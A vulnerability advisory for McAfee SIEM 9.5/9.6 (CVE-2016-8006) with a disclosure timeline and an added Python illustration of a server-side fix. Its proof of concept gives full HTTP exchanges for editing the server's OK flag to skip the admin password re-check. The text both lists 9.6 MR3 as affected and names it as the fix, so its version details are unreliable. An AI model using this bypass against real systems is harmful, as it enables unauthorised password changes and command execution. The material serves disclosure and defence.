McAfee SIEM 9.6 Authentication bypass vulnerability

Date: 12/09/2016
Author: Nico Proietti


Affected Product: McAfee SIEM 9.6 MR3, 9.5 and earlier releases
Credits: Vulnerability discovered by Nico Proietti and Claudio Cinquino of Quantum Leap S.R.L
CVE: CVE-2016-8006

Description Summary

A malicious administrative user can change other SIEM users' information, including their passwords, and can also run GUI "Terminal" commands in an active admin session without supplying the logged-in admin's password a second time.

Proof of Concept

An authentication bypass vulnerability has been detected in the "Users and Groups" and "Terminal" forms of McAfee SIEM ESM 9.5.x and 9.6.x. The forms ask for the admin password again, but they act on the result flag returned by the server rather than on any server-side state. To bypass the check, enter any password in the password form and edit the server's response (in the examples below, the OK field is changed from F to T).

Example of GUI Terminal access that bypasses the admin password prompt.

Request:
POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14


Example of the same bypass on the Users and Groups form.

Request:
POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14


Solution

To fix the security issue we recommend updating to SIEM 9.6.0 MR3 or later; the vendor has resolved this issue in that release.
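The following Python is an added illustration and is not code from the advisory or from McAfee. It decodes the percent-encoded, %13/%14-delimited bodies shown in the proof of concept and contrasts the flawed design (a privileged action gated only by the OK flag the client received) with the fix a defender would expect: the server records a successful re-check itself and consults that record, so an edited response changes nothing. The separator meaning (0x13 field, 0x14 record), the Server class, its stored password and the 300-second window are assumptions for the example; the vendor's actual fix is not described on the page.

```python
# Added example, not part of the advisory or of McAfee's code.
# It decodes the %13/%14-delimited form bodies shown above and contrasts a
# client-trusted "OK" flag with a server-side re-authentication check.
# Assumptions (not stated on the page): 0x13 is a field separator, 0x14 a
# record separator; the Server class and its session data are constructed.
import hmac
import time
from urllib.parse import quote, unquote

FIELD_SEP = "\x13"   # assumed: separates key, value and a trailing empty field
RECORD_SEP = "\x14"  # assumed: terminates one KEY/VALUE record


def parse_body(body: str) -> dict:
    """Decode 'Request=...' or 'Response=...' into {KEY: VALUE}."""
    if "=" not in body:
        raise ValueError("missing form key")
    _, raw = body.split("=", 1)
    fields = {}
    for record in unquote(raw).split(RECORD_SEP):
        if not record:
            continue  # trailing empty record after the final 0x14
        parts = record.split(FIELD_SEP)
        if len(parts) < 2:
            raise ValueError(f"malformed record: {record!r}")
        fields[parts[0]] = parts[1]
    return fields


def encode_body(prefix: str, fields: dict) -> str:
    """Inverse of parse_body, producing the same percent-encoded layout."""
    raw = "".join(f"{k}{FIELD_SEP}{v}{FIELD_SEP}{RECORD_SEP}" for k, v in fields.items())
    return f"{prefix}={quote(raw, safe='')}"


class Server:
    """Constructed stand-in for the /ess endpoint; not the vendor's logic."""

    REAUTH_WINDOW = 300  # seconds a successful re-check stays valid (assumed)

    def __init__(self, passwords: dict):
        self.passwords = passwords   # SID -> password (constructed data)
        self.reauth_until = {}       # SID -> expiry of a server-recorded re-check

    def verify_pw(self, sid: str, pw: str) -> str:
        """USER_VERIFYPW: answer with OK=T/F and record success server-side."""
        ok = hmac.compare_digest(self.passwords.get(sid, ""), pw)
        if ok:
            self.reauth_until[sid] = time.monotonic() + self.REAUTH_WINDOW
        return encode_body("Response", {"EC": "0", "OK": "T" if ok else "F", "DCHNG": "F"})

    def privileged_vulnerable(self, sid: str) -> str:
        # Relies on the client only calling after it saw OK=T: nothing is checked here.
        return "executed"

    def privileged_hardened(self, sid: str) -> str:
        # The flag the client saw is irrelevant; only the server's own record counts.
        expiry = self.reauth_until.get(sid)
        if expiry is None or time.monotonic() > expiry:
            return "denied: re-authentication required"
        del self.reauth_until[sid]   # single use, so one re-check covers one action
        return "executed"


def demo(password: str, edit_response: bool = False) -> tuple:
    """Run one verify-then-act flow; returns (vulnerable result, hardened result)."""
    sid = "1300480451"                       # SID taken from the advisory's request
    server = Server({sid: "correct-horse"})  # constructed stored password
    resp = server.verify_pw(sid, password)
    if edit_response:
        # The response edit shown in the advisory: the OK field flipped from F to T.
        resp = resp.replace("OK%13F", "OK%13T")
    client_sees_ok = parse_body(resp).get("OK") == "T"
    vulnerable = server.privileged_vulnerable(sid) if client_sees_ok else "denied"
    hardened = server.privileged_hardened(sid) if client_sees_ok else "denied"
    return vulnerable, hardened


if __name__ == "__main__":
    print(parse_body("Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14"))
    print("wrong pw, edited reply :", demo("test", edit_response=True))
    print("correct pw             :", demo("correct-horse"))
```

With the wrong password and the edited reply, the vulnerable path executes while the hardened path refuses, because the server never recorded a successful USER_VERIFYPW for that SID. With the correct password both paths execute, and the hardened record is consumed by the first privileged action so that one re-check cannot be replayed for an unlimited series of operations.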

Disclosure Timeline

11/05/2016 - Vulnerability Discovered
12/05/2016 - Initial vendor notification
09/09/2016 - The vendor fixed the vulnerability
09/09/2016 - The vendor published a Knowledge Bulletin

References

[1] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
[2] http://cwe.mitre.org/data/definitions/592.html
[3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744